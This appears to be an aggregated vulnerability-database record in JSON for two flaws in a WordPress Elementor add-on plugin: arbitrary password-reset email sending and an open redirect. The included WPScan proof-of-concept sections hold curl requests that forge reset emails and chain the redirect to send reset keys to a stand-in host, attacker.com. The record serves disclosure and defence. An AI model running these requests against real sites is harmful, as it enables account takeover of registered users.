The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover.
{"id": "CVE-2021-24359", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24359", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover.", "published": "2021-06-14T14:15:00", "modified": "2021-06-18T01:32:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24359", "reporter": "contact@wpscan.com", "references": ["https://theplusaddons.com/changelog/", "https://wpscan.com/vulnerability/486b82d1-30d4-44d2-9542-f33e3f149e92"], "cvelist": ["CVE-2021-24358", "CVE-2021-24359"], "immutableFields": [], "lastseen": "2022-03-23T14:52:57", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24351", "CVE-2021-24358"]}, {"type": "wpexploit", "idList": ["WPEX-ID:2EE62F85-7AEA-4B7D-8B2D-5D86D9FB8016", "WPEX-ID:486B82D1-30D4-44D2-9542-F33E3F149E92", "WPEX-ID:FD4352AD-DAE0-4404-94D1-11083CB1F44D"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:2EE62F85-7AEA-4B7D-8B2D-5D86D9FB8016", "WPVDB-ID:486B82D1-30D4-44D2-9542-F33E3F149E92", "WPVDB-ID:FD4352AD-DAE0-4404-94D1-11083CB1F44D"]}]}, "score": {"value": 4.2, "vector": "NONE"}, "twitter": {"counter": 5, "modified": "2021-06-17T07:42:10", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1405737144484712453", "text": " NEW: CVE-2021-24359 The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send... (click for more) Severity: MEDIUM https://t.co/jLfErfzTDN?amp=1"}, {"link": "https://twitter.com/SecRiskRptSME/status/1404704411440582659", "text": "RT:\n\nCVE-2021-24359 The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a register... \u2026"}, {"link": "https://twitter.com/SecRiskRptSME/status/1404704411440582659", "text": "RT:\n\nCVE-2021-24359 The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a register... \u2026"}, {"link": "https://twitter.com/www_sesin_at/status/1405757252783382530", "text": "New post from https://t.co/9KYxtdHHVL?amp=1 (CVE-2021-24359 (the_plus_addons_for_elementor)) has been published on https://t.co/rQllp20ope?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1405757268851707909", "text": "New post from https://t.co/uXvPWJPHkR?amp=1 (CVE-2021-24359 (the_plus_addons_for_elementor)) has been published on https://t.co/xZA3IsEnHr?amp=1"}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24358"]}, {"type": "wpexploit", "idList": ["WPEX-ID:486B82D1-30D4-44D2-9542-F33E3F149E92"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:486B82D1-30D4-44D2-9542-F33E3F149E92"]}]}, "exploitation": null, "vulnersScore": 4.2}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-284"], "affectedSoftware": [{"cpeName": "posimyth:the_plus_addons_for_elementor", "version": "4.1.11", "operator": "lt", "name": "posimyth the plus addons for elementor"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:posimyth:the_plus_addons_for_elementor:4.1.11:*:*:*:*:wordpress:*:*", "versionEndExcluding": "4.1.11", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://theplusaddons.com/changelog/", "name": "https://theplusaddons.com/changelog/", "refsource": "MISC", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://wpscan.com/vulnerability/486b82d1-30d4-44d2-9542-f33e3f149e92", "name": "https://wpscan.com/vulnerability/486b82d1-30d4-44d2-9542-f33e3f149e92", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpvulndb": [{"lastseen": "2021-09-14T23:41:52", "description": "The plugin did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover. \n\n### PoC\n\nThe vulnerable code leading to the issue is inside the function \"theplus_ajax_forgot_password_ajax\" in \"theplus_elementor_addon/includes/plus_addon.php\". To be exploitable, the widget 'WP Login & Register' should be activated and present on a page of the wordpress site First, you should go to the page where the widget is present and open the developer console to get the nonce called \"tp_user_lost_password_nonce\". Once you get the nonce, you can exploit the function with the following request: curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user;_login=john&f;_p_opt=f_p_frontend&nonce;=nonce_you_got&tceol;[tp_cst_email_lost_opt]=yes&tceol;[tp_cst_email_lost_subject]=Hey&tceol;[tp_cst_email_lost_message]=Hello from my wordpress site' where john is a registered user on the wordpress site. John will received an email with Subject 'Hey' and body 'Hello from my wordpress site' If we include \u2018[tplr_link]\u2019 in the email body, it will be replaced by a password reset link, for example: curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user;_login=john&f;_p_opt=f_p_frontend&nonce;=nonce_you_got&tceol;[tp_cst_email_lost_opt]=yes&tceol;[tp_cst_email_lost_subject]=Hey&tceol;[tp_cst_email_lost_message]=Link : [tplr_link]' John will receive an email with subject 'Hey' and body 'Link : http://localhost/wordpress/wp-login.php?action=theplusrp&key;=9aMCdd1ugxQc65dWot3i&redirecturl;=&forgoturl;=&login;=john' It is possible to chain this vulnerability with an open redirect reported separately, with the request : curl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user;_login=john&f;_p_opt=f_p_frontend&nonce;=nonce_you_got&tceol;[tp_cst_email_lost_opt]=yes&tceol;[tp_cst_email_lost_subject]=Hey&tceol;[tp_cst_email_lost_message]=Hello, check our new post : [tplr_link]&resetpageurl;=http://attacker.com&forgotpageurl;=http://attacker.com' John will receive an email with body : 'Hello, check our new post : http://localhost/wordpress/wp-login.php?action=theplusrp&key;=9aMCdd1ugxQc65dWot3i&redirecturl;=http://attacker.com&forgoturl;=http://attacker.com&login;=john' If he clicks the link, he will be redirected to http://attacker.com/?login=john&key;=9aMCdd1ugxQc65dWot3i&action;=theplusrp So the attacker gets the key to reset john password, he can do so by visiting the page where the widget is present with the parameters he got, for example : http://localhost/wordpress/hello-world/?action=theplusrp&login;=john&key;=9aMCdd1ugxQc65dWot3i\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-05-31T00:00:00", "type": "wpvulndb", "title": "The Plus Addons for Elementor Page Builder < 4.1.11 - Arbitrary Reset Pwd Email Sending", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24359"], "modified": "2021-05-31T07:02:10", "id": "WPVDB-ID:486B82D1-30D4-44D2-9542-F33E3F149E92", "href": "https://wpscan.com/vulnerability/486b82d1-30d4-44d2-9542-f33e3f149e92", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-14T23:41:54", "description": "The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.\n\n### PoC\n\nThe vulnerable code leading to the open redirect is in the function \"redirect_to_tp_custom_password_reset\" in \"theplus_elementor_addon/includes/plus_addon.php\" The url : https://example.com/wp-login.php?action=theplusrp&key;=&redirecturl;=http://attacker.com&forgoturl;=http://attacker.com&login;=john with John as a registered user on the WordPress blog, will redirect the user to http://attacker.com \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-31T00:00:00", "type": "wpvulndb", "title": "The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24358"], "modified": "2021-05-31T07:02:04", "id": "WPVDB-ID:FD4352AD-DAE0-4404-94D1-11083CB1F44D", "href": "https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-09-14T23:41:52", "description": "The plugin did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-05-31T00:00:00", "type": "wpexploit", "title": "The Plus Addons for Elementor Page Builder < 4.1.11 - Arbitrary Reset Pwd Email Sending", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24359"], "modified": "2021-05-31T07:02:10", "id": "WPEX-ID:486B82D1-30D4-44D2-9542-F33E3F149E92", "href": "", "sourceData": "The vulnerable code leading to the issue is inside the function \"theplus_ajax_forgot_password_ajax\" in \"theplus_elementor_addon/includes/plus_addon.php\". \r\n\r\nTo be exploitable, the widget 'WP Login & Register' should be activated and present on a page of the wordpress site\r\n\r\nFirst, you should go to the page where the widget is present and open the developer console to get the nonce called \"tp_user_lost_password_nonce\". \r\n\r\nOnce you get the nonce, you can exploit the function with the following request: \r\ncurl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Hello from my wordpress site'\r\n\r\nwhere john is a registered user on the wordpress site. John will received an email with Subject 'Hey' and body 'Hello from my wordpress site'\r\n\r\nIf we include \u2018[tplr_link]\u2019 in the email body, it will be replaced by a password reset link, for example:\r\n\r\ncurl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Link : [tplr_link]'\r\n\r\nJohn will receive an email with subject 'Hey' and body 'Link : http://localhost/wordpress/wp-login.php?action=theplusrp&key=9aMCdd1ugxQc65dWot3i&redirecturl=&forgoturl=&login=john'\r\n\r\nIt is possible to chain this vulnerability with an open redirect reported separately, with the request :\r\n\r\ncurl -isk -X 'POST' 'http://localhost/wordpress/wp-admin/admin-ajax.php' --data 'action=theplus_ajax_forgot_password&user_login=john&f_p_opt=f_p_frontend&nonce=nonce_you_got&tceol[tp_cst_email_lost_opt]=yes&tceol[tp_cst_email_lost_subject]=Hey&tceol[tp_cst_email_lost_message]=Hello, check our new post : [tplr_link]&resetpageurl=http://attacker.com&forgotpageurl=http://attacker.com'\r\n\r\nJohn will receive an email with body :\r\n'Hello, check our new post : http://localhost/wordpress/wp-login.php?action=theplusrp&key=9aMCdd1ugxQc65dWot3i&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=john'\r\n\r\nIf he clicks the link, he will be redirected to http://attacker.com/?login=john&key=9aMCdd1ugxQc65dWot3i&action=theplusrp\r\n\r\nSo the attacker gets the key to reset john password, he can do so by visiting the page where the widget is present with the parameters he got, for example : http://localhost/wordpress/hello-world/?action=theplusrp&login=john&key=9aMCdd1ugxQc65dWot3i", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-09-14T23:41:54", "description": "The plugin did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-31T00:00:00", "type": "wpexploit", "title": "The Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24358"], "modified": "2021-05-31T07:02:04", "id": "WPEX-ID:FD4352AD-DAE0-4404-94D1-11083CB1F44D", "href": "", "sourceData": "The vulnerable code leading to the open redirect is in the function \"redirect_to_tp_custom_password_reset\" in \"theplus_elementor_addon/includes/plus_addon.php\"\r\n\r\nThe url : https://example.com/wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login=john\r\n\r\nwith John as a registered user on the WordPress blog, will redirect the user to http://attacker.com\r\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:52:55", "description": "The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-14T14:15:00", "type": "cve", "title": "CVE-2021-24358", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24358"], "modified": "2021-06-18T01:25:00", "cpe": [], "id": "CVE-2021-24358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24358", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": []}]}
CVE-2021-24359
